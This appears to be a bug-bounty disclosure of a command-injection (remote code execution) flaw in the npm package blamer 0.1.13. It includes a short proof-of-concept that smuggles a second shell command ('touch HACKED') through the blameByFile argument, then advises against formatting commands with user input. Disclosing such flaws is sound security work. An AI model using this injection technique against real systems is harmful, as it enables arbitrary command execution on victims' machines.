I would like to report a RCE
issue in the blamer
module.
It allows to execute arbitrary commands remotely inside the victim's PC
module name: blamer
version:0.1.13
npm page: https://www.npmjs.com/package/blamer
> Blamer is a tool for get information about author of code from version control system. Supports git and subversion.
[~1800] downloads in the last day
[12,910] downloads in the last week
[~52k] downloads in the last month
The issue occurs because a user input
is formatted inside a command
that will be executed without any check. The issue arises here: https://github.com/kucherenko/blamer/blob/master/src/vcs/git.js#L24
// poc.js
var Blamer = require('blamer');
var blamer = new Blamer('git');
blamer.blameByFile('poc.js', 'test; touch HACKED;#');
HACKED
npm i blamer # Install affected module
node poc.js # Run the PoC
HACKED
has been created :) {F681902}> Don’t format commands
using insecure user's inputs
:)
RCE
via command formatting on blamer